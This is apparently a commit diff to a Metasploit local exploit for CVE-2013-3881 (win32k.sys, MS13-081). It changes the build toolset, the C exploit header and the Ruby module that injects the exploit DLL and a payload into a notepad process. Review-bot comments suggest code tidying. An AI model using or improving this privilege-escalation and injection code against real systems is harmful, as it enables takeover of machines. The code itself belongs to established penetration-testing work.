Upgrade toolchain to Visual Studio 2013 v120.
parent
01f41a209c
commit
0ac1acda70
|
@ -3,7 +3,7 @@
|
|||
* Date: February 5, 2014
|
||||
* Vulnerability Discovery: Seth Gibson and Dan Zentner of Endgame
|
||||
* Exploit Author: Spencer McIntyre
|
||||
* Version: Windows 7 SP1
|
||||
* Version: Windows 7 SP0/SP1
|
||||
* Tested on: Windows 7 SP0/SP1
|
||||
* CVE-2013-3881 MS13-081
|
||||
* References:
|
||||
|
@ -22,7 +22,11 @@
|
|||
#define WIN32_NO_STATUS
|
||||
#include <windows.h>
|
||||
#undef WIN32_NO_STATUS
|
||||
#include <winternl.h>
|
||||
|
||||
#ifndef _NTDEF_
|
||||
typedef __success(return >= 0) LONG NTSTATUS;
|
||||
typedef NTSTATUS *PNTSTATUS;
|
||||
#endif
|
||||
|
||||
#define TABLE_BASE 0xff910000
|
||||
|
||||
|
|
|
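Review bot: The fallback `NTSTATUS` typedef added after `#include <winternl.h>` has no comment saying which header configuration it covers, and it uses the legacy `__success` annotation even though this commit moves the build to the v120 toolset. A one-line comment such as `/* NTSTATUS fallback for builds where ntdef.h is not pulled in */` above the `#ifndef _NTDEF_` would make the intent clear. With the newer SAL headers the typedef would normally read `typedef _Return_type_success_(return >= 0) LONG NTSTATUS;`. The winternl.h shipped with the SDK in use may already declare `NTSTATUS`; that is not visible here, so it is worth confirming the block does not duplicate it.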
@ -1,5 +1,5 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
|
@ -20,14 +20,14 @@
|
|||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<PlatformToolset>v90</PlatformToolset>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<PlatformToolset>v90</PlatformToolset>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
|
|
|
@ -22,8 +22,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'Description' => %q{
|
||||
This module exploits a vulnerability in win32k.sys where under
|
||||
specific conditions TrackPopupMenuEx will pass a NULL pointer to
|
||||
the EndMenuState. This module has been tested successfully on
|
||||
Windows 7 SP0 and Windows 7 SP1.
|
||||
the MNEndMenuState procedure. This module has been tested
|
||||
successfully on Windows 7 SP0 and Windows 7 SP1.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -102,15 +102,15 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.getpid}...")
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
library_path = ::File.join(Msf::Config.data_directory, "exploits",
|
||||
"cve-2013-3881", "cve-2013-3881.x86.dll")
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
print_status("Injecting exploit into #{process.getpid} ...")
|
||||
print_status("Injecting exploit into #{process.pid}...")
|
||||
exploit_mem, offset = inject_dll_into_process(process, library_path)
|
||||
|
||||
print_status("Exploit injected. Injecting payload into #{process.getpid}...")
|
||||
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
||||
payload_mem = inject_into_process(process, payload.encoded)
|
||||
|
||||
# invoke the exploit, passing in the address of the payload that
|
||||
|
|
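Review bot: The two status lines before `inject_dll_into_process` now say almost the same thing: `"Reflectively injecting the exploit DLL into #{process.pid}..."` and `"Injecting exploit into #{process.pid}..."`. Since this change already touches both, the second could be dropped so the operator log shows one message per step. Separately, `library_path` is only passed through `::File.expand_path`, which does not check that the DLL exists. A missing file would presumably surface as an error from inside the injection helper; an explicit `::File.file?(library_path)` check with a clear failure message would be easier to diagnose. The enclosing method starts and ends outside the hunk.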